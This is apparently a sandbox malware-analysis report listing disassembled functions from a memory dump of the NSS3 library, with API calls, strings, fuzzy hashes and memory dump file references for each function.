Opcode ID: 678bac127106b442e8dac9a1274060e7cbc86fc0436b02d579ac1ade599ce5b9
Instruction ID: fe60cf604e765e0e7b2747688e87bca3ef6d612ecd8647bc49f4c68ee8a997aa
Opcode Fuzzy Hash: 678bac127106b442e8dac9a1274060e7cbc86fc0436b02d579ac1ade599ce5b9
Instruction Fuzzy Hash: 6B210035618B059BC7108E1AD941B5AB7F6EF80318F28852CD849DBF50E770F9888B92

Function 6CB56B20 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 71COMMON

Download Yara Rule

APIs

sqlite3_snprintf.NSS3(?,6CB56AC0,6CBBAAF9,00000000,?,6CB56AC0,?), ref: 6CB56BA9
sqlite3_free.NSS3(00000000,?,?,?,?,?,6CB56AC0,?), ref: 6CB56BB2
sqlite3_snprintf.NSS3(?,6CB56AC0,OsError 0x%lx (%lu),00000000,00000000,?,6CB56AC0,?), ref: 6CB56BD9

Strings

OsError 0x%lx (%lu), xrefs: 6CB56BCE

Memory Dump Source

Source File: 00000001.00000002.2772818162.000000006CA01000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CA00000, based on PE: true

Associated: 00000001.00000002.2772756524.000000006CA00000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773556877.000000006CB9F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773680424.000000006CBDE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773708353.000000006CBDF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773766585.000000006CBE0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773790796.000000006CBE5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6ca00000_file.jbxd

Similarity

API ID: sqlite3_snprintf$sqlite3_free
String ID: OsError 0x%lx (%lu)
API String ID: 2089385377-3720535092
Opcode ID: d818ce0a6eaddfb0141947b6e6048647008a925f382089ce508905a3111d16a8
Instruction ID: 02467d1835262c274c9f136f119ab21f9167804682008848809e24de64688b20
Opcode Fuzzy Hash: d818ce0a6eaddfb0141947b6e6048647008a925f382089ce508905a3111d16a8
Instruction Fuzzy Hash: 5211A279A00145ABDB089FA5EC99DBF7B7DEF89755700042CF50693641DB305D04CAB2

Function 6CB4CC70 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 62COMMON

Download Yara Rule

APIs

Part of subcall function 6CB4CD70: PR_LoadLibrary.NSS3(ws2_32.dll,?,?,?,6CB4CC7B), ref: 6CB4CD7A
Part of subcall function 6CB4CD70: PR_FindSymbol.NSS3(00000000,getaddrinfo), ref: 6CB4CD8E
Part of subcall function 6CB4CD70: PR_FindSymbol.NSS3(00000000,freeaddrinfo), ref: 6CB4CDA5
Part of subcall function 6CB4CD70: PR_FindSymbol.NSS3(00000000,getnameinfo), ref: 6CB4CDB8

PR_GetUniqueIdentity.NSS3(Ipv6_to_Ipv4 layer), ref: 6CB4CCB5
memcpy.VCRUNTIME140(6CBE14F4,6CBE02AC,00000090), ref: 6CB4CCD3
memcpy.VCRUNTIME140(6CBE1588,6CBE02AC,00000090), ref: 6CB4CD2B

Part of subcall function 6CA69AC0: socket.WSOCK32(?,00000017,6CA699BE), ref: 6CA69AE6
Part of subcall function 6CA69AC0: ioctlsocket.WSOCK32(00000000,8004667E,00000001,?,00000017,6CA699BE), ref: 6CA69AFC

Part of subcall function 6CA70590: closesocket.WSOCK32(6CA69A8F,?,?,6CA69A8F,00000000), ref: 6CA70597

Strings

Ipv6_to_Ipv4 layer, xrefs: 6CB4CCB0

Memory Dump Source

Source File: 00000001.00000002.2772818162.000000006CA01000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CA00000, based on PE: true

Associated: 00000001.00000002.2772756524.000000006CA00000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773556877.000000006CB9F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773680424.000000006CBDE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773708353.000000006CBDF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773766585.000000006CBE0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773790796.000000006CBE5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6ca00000_file.jbxd

Similarity

API ID: FindSymbol$memcpy$IdentityLibraryLoadUniqueclosesocketioctlsocketsocket
String ID: Ipv6_to_Ipv4 layer
API String ID: 1231378898-412307543
Opcode ID: cead0b770fa58d4c4b5941ea9759dff0f365728be8960c7a3533cfd63799f645
Instruction ID: 49a58e10596c681ad86cc54b3744f518f0559b781bca3583b2abc802673c66d0
Opcode Fuzzy Hash: cead0b770fa58d4c4b5941ea9759dff0f365728be8960c7a3533cfd63799f645
Instruction Fuzzy Hash: CB1178B5B012C05EDB409B69984676636F8A34FE94F381035E40987B53D771CC44DBD2

Function 6CA6AB80 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 52COMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32 ref: 6CA6AB8A
PR_SetError.NSS3(FFFFE897,00000000), ref: 6CA6AC07

Part of subcall function 6CB2C2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6CB2C2BF

PR_LogPrint.NSS3(connect -> %d,00000000), ref: 6CA6AC1A

Strings

connect -> %d, xrefs: 6CA6AC15

Memory Dump Source

Source File: 00000001.00000002.2772818162.000000006CA01000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CA00000, based on PE: true

Associated: 00000001.00000002.2772756524.000000006CA00000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773556877.000000006CB9F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773680424.000000006CBDE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773708353.000000006CBDF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773766585.000000006CBE0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773790796.000000006CBE5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6ca00000_file.jbxd

Similarity

API ID: Value$ErrorPrint
String ID: connect -> %d
API String ID: 1784924131-3487059786
Opcode ID: 3bd818e4ceb2bb00382cb0394d80ac35d0fc0e779b6a7e9a68a8041d48a2f323
Instruction ID: e33ac2981bb75abe2212e1400a192beb68a1cd14f426e2a784eb30bf26e40968
Opcode Fuzzy Hash: 3bd818e4ceb2bb00382cb0394d80ac35d0fc0e779b6a7e9a68a8041d48a2f323
Instruction Fuzzy Hash: 06012670A001545BF7002F39DC0ABBA3B67EB42369F488674E8198BE52EB319CD48291

Function 6CB92BE0 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 49COMMON

Download Yara Rule

APIs

PR_EnterMonitor.NSS3 ref: 6CB92BFA
PR_ExitMonitor.NSS3 ref: 6CB92C2B
PR_LogPrint.NSS3(%s incr => %d (for %s),?,?,?), ref: 6CB92C5D

Strings

%s incr => %d (for %s), xrefs: 6CB92C58

Memory Dump Source

Source File: 00000001.00000002.2772818162.000000006CA01000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CA00000, based on PE: true

Associated: 00000001.00000002.2772756524.000000006CA00000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773556877.000000006CB9F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773680424.000000006CBDE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773708353.000000006CBDF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773766585.000000006CBE0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773790796.000000006CBE5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6ca00000_file.jbxd

Similarity

API ID: Monitor$EnterExitPrint
String ID: %s incr => %d (for %s)
API String ID: 2736670396-2912983388
Opcode ID: aa3d97ac09b11c44cedcd9c358a43bd6f5bc70dca10b90c8ab51fbf17161cbc7
Instruction ID: 923db31739c5899811b8d87e1a8baa4fe2db00357bc801746b7c9b3cfe67127c
Opcode Fuzzy Hash: aa3d97ac09b11c44cedcd9c358a43bd6f5bc70dca10b90c8ab51fbf17161cbc7
Instruction Fuzzy Hash: C101B575F001909FDB519F19D944A4A77B9EB4A75CB188435E809C7B01DA31EC48C7A3

Function 6CA0A8E0 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 44COMMON

Download Yara Rule

APIs

Part of subcall function 6CB3A480: _byteswap_ushort.API-MS-WIN-CRT-UTILITY-L1-1-0(?,?,?,?,?,?,?,6CB5C3A2,?,?,00000000,00000000), ref: 6CB3A528
Part of subcall function 6CB3A480: sqlite3_log.NSS3(0000000B,%s at line %d of [%.10s],database corruption,00011843,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4), ref: 6CB3A6E0

sqlite3_log.NSS3(0000000B,%s at line %d of [%.10s],database corruption,00014576,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4), ref: 6CA0A94F

Strings

database corruption, xrefs: 6CA0A943
9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4, xrefs: 6CA0A939
%s at line %d of [%.10s], xrefs: 6CA0A948

Memory Dump Source

Source File: 00000001.00000002.2772818162.000000006CA01000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CA00000, based on PE: true

Associated: 00000001.00000002.2772756524.000000006CA00000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773556877.000000006CB9F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773680424.000000006CBDE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773708353.000000006CBDF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773766585.000000006CBE0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773790796.000000006CBE5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6ca00000_file.jbxd

Similarity

API ID: sqlite3_log$_byteswap_ushort
String ID: %s at line %d of [%.10s]$9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4$database corruption
API String ID: 491875419-598938438
Opcode ID: e6ad272759815f293b7e33251584dbe0367b1efcd399e43af7b7c93d5613cb75
Instruction ID: 442ba221bbc15229df76ec64ab1ad0afa102079e8add90ad7a4cb2706a6e0119
Opcode Fuzzy Hash: e6ad272759815f293b7e33251584dbe0367b1efcd399e43af7b7c93d5613cb75
Instruction Fuzzy Hash: AE014931B002085BC7108BBAEC11B9FB3F9AB4439DF454439E94DA7B40DB71AC48C791

Function 6CA98850 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 43COMMON

Download Yara Rule

APIs

calloc.MOZGLUE(00000001,00000028,00000000,?,?,6CAA0715), ref: 6CA98859
PR_NewLock.NSS3 ref: 6CA98874

Part of subcall function 6CB498D0: calloc.MOZGLUE(00000001,00000084,6CA70936,00000001,?,6CA7102C), ref: 6CB498E5

PL_InitArenaPool.NSS3(-00000008,NSS,00000800,00000008), ref: 6CA9888D

Strings

NSS, xrefs: 6CA98887

Memory Dump Source

Source File: 00000001.00000002.2772818162.000000006CA01000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CA00000, based on PE: true

Associated: 00000001.00000002.2772756524.000000006CA00000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773556877.000000006CB9F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773680424.000000006CBDE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773708353.000000006CBDF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773766585.000000006CBE0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773790796.000000006CBE5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6ca00000_file.jbxd

Similarity

API ID: calloc$ArenaInitLockPool
String ID: NSS
API String ID: 2230817933-3870390017
Opcode ID: 7a6d5a6c0e221a67fe9861449147f037d3d026c2c48a87d1f57139286eb60245
Instruction ID: f639da4edfb08272c4a44dace0a9b7360b185464e25b72bdceba8520da3936df
Opcode Fuzzy Hash: 7a6d5a6c0e221a67fe9861449147f037d3d026c2c48a87d1f57139286eb60245
Instruction Fuzzy Hash: 1EF0F666E4122037F21022686D0BB8635C85F5179EF084032E90CE7B82FA42955C82F3

Function 6CA7C9B0 Relevance: 6.1, APIs: 4, Instructions: 128stringCOMMON

Download Yara Rule

APIs

sqlite3_mprintf.NSS3 ref: 6CA7CB3D
strlen.API-MS-WIN-CRT-STRING-L1-1-0 ref: 6CA7CB4B
sqlite3_free.NSS3 ref: 6CA7CB70
sqlite3_result_error_nomem.NSS3 ref: 6CA7CB99

Memory Dump Source

Source File: 00000001.00000002.2772818162.000000006CA01000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CA00000, based on PE: true

Associated: 00000001.00000002.2772756524.000000006CA00000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773556877.000000006CB9F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773680424.000000006CBDE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773708353.000000006CBDF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773766585.000000006CBE0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773790796.000000006CBE5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6ca00000_file.jbxd

Similarity

API ID: sqlite3_freesqlite3_mprintfsqlite3_result_error_nomemstrlen
String ID:
API String ID: 1052848593-0
Opcode ID: f0ca381153d7da440c63fae0732a55c3761ad619c98c0f7ce92d6ab199147ef9
Instruction ID: 8bb40d6e0823dafe83444af8d6fc4896abf33d569c85533d929b620f30735ea2
Opcode Fuzzy Hash: f0ca381153d7da440c63fae0732a55c3761ad619c98c0f7ce92d6ab199147ef9
Instruction Fuzzy Hash: 4F51C336608B498AC721EF35C05022FB7F1BF8679DF14860DE8956B650EB34D4D9C762

Function 6CB44FF0 Relevance: 6.1, APIs: 4, Instructions: 123COMMON

Download Yara Rule

APIs

_byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(00000000,00000000,?,?,00000001,?,6CA285D2,00000000,?,?), ref: 6CB44FFD
_byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6CB4500C
_byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6CB450C8
_byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6CB450D6

Memory Dump Source

Source File: 00000001.00000002.2772818162.000000006CA01000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CA00000, based on PE: true

Associated: 00000001.00000002.2772756524.000000006CA00000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773556877.000000006CB9F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773680424.000000006CBDE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773708353.000000006CBDF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773766585.000000006CBE0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773790796.000000006CBE5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6ca00000_file.jbxd

Similarity

API ID: _byteswap_ulong
String ID:
API String ID: 4101233201-0
Opcode ID: c1842a32e4e7e127450c3a2af53b9f41a547574912252666c9cd46b28f398346
Instruction ID: 0f074f143d44afec2a54c051564f3b1b46648aa324e940a5248fa001c87709e9
Opcode Fuzzy Hash: c1842a32e4e7e127450c3a2af53b9f41a547574912252666c9cd46b28f398346
Instruction Fuzzy Hash: 00419EB6A006518BCB18CF18DCD179AB7E1FF4431871D866DC84ACBB06E379E895CB85

Function 6CB9A860 Relevance: 6.1, APIs: 4, Instructions: 111COMMON

Download Yara Rule

APIs

Part of subcall function 6CB9A690: calloc.MOZGLUE(00000001,00000044,?,?,?,?,6CB9A662), ref: 6CB9A69E
Part of subcall function 6CB9A690: PR_NewCondVar.NSS3(?), ref: 6CB9A6B4

PR_IntervalNow.NSS3 ref: 6CB9A8C6
EnterCriticalSection.KERNEL32(?), ref: 6CB9A8EB
_PR_MD_UNLOCK.NSS3(?), ref: 6CB9A944
PR_SetPollableEvent.NSS3(?), ref: 6CB9A94F

Memory Dump Source

Source File: 00000001.00000002.2772818162.000000006CA01000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CA00000, based on PE: true

Associated: 00000001.00000002.2772756524.000000006CA00000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773556877.000000006CB9F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773680424.000000006CBDE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773708353.000000006CBDF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773766585.000000006CBE0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773790796.000000006CBE5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6ca00000_file.jbxd

Similarity

API ID: CondCriticalEnterEventIntervalPollableSectioncalloc
String ID:
API String ID: 811965633-0
Opcode ID: 39551b6a21fcf24147cb1d25084a7b2dc5f369859289f834a638547c5567ba34
Instruction ID: 10ba15f554affa3a133d80bcde374b776844b89a6e2c8465b4a22ee6b4b9e630
Opcode Fuzzy Hash: 39551b6a21fcf24147cb1d25084a7b2dc5f369859289f834a638547c5567ba34
Instruction Fuzzy Hash: 234125B4A01A42DFCB44CF29C58099AFBF5FF49318725856AE94ACBB11E731E850CF91

Function 6CAF2C80 Relevance: 6.1, APIs: 4, Instructions: 105COMMON

Download Yara Rule

APIs

PR_SetError.NSS3(FFFFE002,00000000,?,6CAF1289,?), ref: 6CAF2D72

Part of subcall function 6CAF3390: PORT_ZAlloc_Util.NSS3(00000000,-0000002C,?,6CAF2CA7,E80C76FF,?,6CAF1289,?), ref: 6CAF33E9
Part of subcall function 6CAF3390: PORT_ZAlloc_Util.NSS3(0000001C), ref: 6CAF342E

PK11_FreeSymKey.NSS3(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,6CAF1289,?), ref: 6CAF2D61

Part of subcall function 6CAF0B00: SECOID_GetAlgorithmTag_Util.NSS3(?), ref: 6CAF0B21
Part of subcall function 6CAF0B00: SECITEM_ZfreeItem_Util.NSS3(?,00000001), ref: 6CAF0B64

PR_SetError.NSS3(FFFFE02D,00000000,?,?,?,?,6CAF1289,?), ref: 6CAF2D88
PR_SetError.NSS3(FFFFE006,00000000,?,?,?,?,?,6CAF1289,?), ref: 6CAF2DAF

Part of subcall function 6CAAB8F0: PR_CallOnceWithArg.NSS3(6CBE2178,6CAABCF0,?), ref: 6CAAB915
Part of subcall function 6CAAB8F0: PK11_GetAllTokens.NSS3(000000FF,00000000,00000001,?), ref: 6CAAB933
Part of subcall function 6CAAB8F0: PK11_GetAllTokens.NSS3(000000FF,00000000,00000000,?), ref: 6CAAB9C8
Part of subcall function 6CAAB8F0: SECITEM_AllocItem_Util.NSS3(00000000,00000000,00000008), ref: 6CAAB9E1

Part of subcall function 6CAF0A50: SECOID_GetAlgorithmTag_Util.NSS3(6CAF2A90,E8571076,?,6CAF2A7C,6CAF21F1,?,?,?,00000000,00000000,?,?,6CAF21DD,00000000), ref: 6CAF0A66

Part of subcall function 6CAF3310: SECOID_GetAlgorithmTag_Util.NSS3(?,00000000,FFFFFFFF,?,6CAF2D1E,?,?,?,?,00000000,?,?,?,?,?,6CAF1289), ref: 6CAF3348

Part of subcall function 6CAF06F0: PORT_ZAlloc_Util.NSS3(0000000C,00000000,?,6CAF2E70,00000000), ref: 6CAF0701

Memory Dump Source

Source File: 00000001.00000002.2772818162.000000006CA01000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CA00000, based on PE: true

Associated: 00000001.00000002.2772756524.000000006CA00000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773556877.000000006CB9F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773680424.000000006CBDE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773708353.000000006CBDF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773766585.000000006CBE0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773790796.000000006CBE5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6ca00000_file.jbxd

Similarity

API ID: Util$AlgorithmAlloc_ErrorK11_Tag_$Item_Tokens$AllocCallFreeOnceWithZfree
String ID:
API String ID: 2288138528-0
Opcode ID: 8546e08e28100fe682e9ef3c81ee26992161300af297bb711fe42b1ebbdd5512
Instruction ID: 7fff957b61042bad33cfdaeb18638d36e901e99a266cf3ff4c24531fd65adac6
Opcode Fuzzy Hash: 8546e08e28100fe682e9ef3c81ee26992161300af297bb711fe42b1ebbdd5512
Instruction Fuzzy Hash: BF310CB69002456BDB009E64ED44BAA3765AF4531DF180230FD289B791F731E9AEC7B2

Function 6CAF6AE0 Relevance: 6.1, APIs: 4, Instructions: 105threadCOMMON

Download Yara Rule

APIs

PR_GetCurrentThread.NSS3 ref: 6CAF6B3E

Part of subcall function 6CAF6C20: free.MOZGLUE(?,?,?,?,?,?,?,?,?,?), ref: 6CAF6C8A
Part of subcall function 6CAF6C20: free.MOZGLUE(?,?,?,?,?,?,?,?,?,?), ref: 6CAF6C90

Part of subcall function 6CAF7E20: PR_SetError.NSS3(00000000,00000000), ref: 6CAF7E5F

PR_SetError.NSS3(FFFFD07B,00000000), ref: 6CAF6B84
PR_EnterMonitor.NSS3(?), ref: 6CAF6BE0
PR_ExitMonitor.NSS3(?), ref: 6CAF6C01

Memory Dump Source

Source File: 00000001.00000002.2772818162.000000006CA01000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CA00000, based on PE: true

Associated: 00000001.00000002.2772756524.000000006CA00000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773556877.000000006CB9F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773680424.000000006CBDE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773708353.000000006CBDF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773766585.000000006CBE0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773790796.000000006CBE5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6ca00000_file.jbxd

Similarity

API ID: ErrorMonitorfree$CurrentEnterExitThread
String ID:
API String ID: 4197271849-0
Opcode ID: e9e7fe317ea268f98c03a5d5e2cab8cc2dccd2529203971077aeb0689a42cef7
Instruction ID: d5e170013310d138c14bf223a38d7edf71d0767a73793bab2502e373444dd98f
Opcode Fuzzy Hash: e9e7fe317ea268f98c03a5d5e2cab8cc2dccd2529203971077aeb0689a42cef7
Instruction Fuzzy Hash: F731F3B1A8010557D7109A389C95BAF3668DF4132CF4C0271FD29DBB96E731D98BC7A1

Function 6CA86C50 Relevance: 6.1, APIs: 4, Instructions: 102memoryCOMMON

Download Yara Rule

APIs

PORT_ArenaAlloc_Util.NSS3(?,00000001), ref: 6CA86C8D
memset.VCRUNTIME140(00000000,00000000,00000001), ref: 6CA86CA9
PORT_ArenaAlloc_Util.NSS3(?,0000000C), ref: 6CA86CC0
SEC_ASN1EncodeItem_Util.NSS3(?,00000000,?,6CBA8FE0), ref: 6CA86CFE

Memory Dump Source

Source File: 00000001.00000002.2772818162.000000006CA01000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CA00000, based on PE: true

Associated: 00000001.00000002.2772756524.000000006CA00000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773556877.000000006CB9F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773680424.000000006CBDE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773708353.000000006CBDF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773766585.000000006CBE0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773790796.000000006CBE5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6ca00000_file.jbxd

Similarity

API ID: Util$Alloc_Arena$EncodeItem_memset
String ID:
API String ID: 2370200771-0
Opcode ID: 89ef983ca4d356b8928e2eb58e5924ec72fea6b0e865d6ebfcc49790e0f8b8cf
Instruction ID: 33ef8c041aa0cc579cff55184389209da28dc70690d2c0644ad36f821a9b0ce7
Opcode Fuzzy Hash: 89ef983ca4d356b8928e2eb58e5924ec72fea6b0e865d6ebfcc49790e0f8b8cf
Instruction Fuzzy Hash: BD31AEB1A012169FEB08CF65C881ABFBBF5EF49248B14442DD905E7700FB319946CBA0

Function 6CB94F00 Relevance: 6.1, APIs: 4, Instructions: 101fileCOMMON

Download Yara Rule

APIs

CreateFileA.KERNEL32(?,40000000,00000003,00000000,?,?,00000000), ref: 6CB94F5D
free.MOZGLUE(?), ref: 6CB94F74
free.MOZGLUE(?), ref: 6CB94F82
GetLastError.KERNEL32 ref: 6CB94F90

Memory Dump Source

Source File: 00000001.00000002.2772818162.000000006CA01000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CA00000, based on PE: true

Associated: 00000001.00000002.2772756524.000000006CA00000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773556877.000000006CB9F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773680424.000000006CBDE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773708353.000000006CBDF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773766585.000000006CBE0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773790796.000000006CBE5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6ca00000_file.jbxd

Similarity

API ID: free$CreateErrorFileLast
String ID:
API String ID: 17951984-0
Opcode ID: eb1edd835798f83e69dc420257b8320028df112e7c476553bbeefebd102a8ad0
Instruction ID: 1b4ae19920bff83fc51bbfe4b3d9d1f2beb042ce861f727f15c0fe2fe5a1f874
Opcode Fuzzy Hash: eb1edd835798f83e69dc420257b8320028df112e7c476553bbeefebd102a8ad0
Instruction Fuzzy Hash: 7731FB75A0065A5BDF01CB69DC41BDFB3B8EF46358F050235EC2AA7781DB34E9048A92

Function 6CAF6DE0 Relevance: 6.1, APIs: 4, Instructions: 88COMMON

Download Yara Rule

APIs

PR_MillisecondsToInterval.NSS3(?), ref: 6CAF6E36
PR_SetError.NSS3(FFFFE005,00000000), ref: 6CAF6E57

Part of subcall function 6CB2C2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6CB2C2BF

PR_MillisecondsToInterval.NSS3(?), ref: 6CAF6E7D
PR_MillisecondsToInterval.NSS3(?), ref: 6CAF6EAA

Memory Dump Source

Source File: 00000001.00000002.2772818162.000000006CA01000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CA00000, based on PE: true

Associated: 00000001.00000002.2772756524.000000006CA00000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773556877.000000006CB9F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773680424.000000006CBDE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773708353.000000006CBDF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773766585.000000006CBE0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773790796.000000006CBE5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6ca00000_file.jbxd

Similarity

API ID: IntervalMilliseconds$ErrorValue
String ID:
API String ID: 3163584228-0
Opcode ID: 49dd0898e987e4a825f48e12946c9ed22966ea52047a14c81e5999c154b12ce9
Instruction ID: 83c168db55ad21507329a94bc29376b268a13a2025ecfad6656b1928c1d247ba
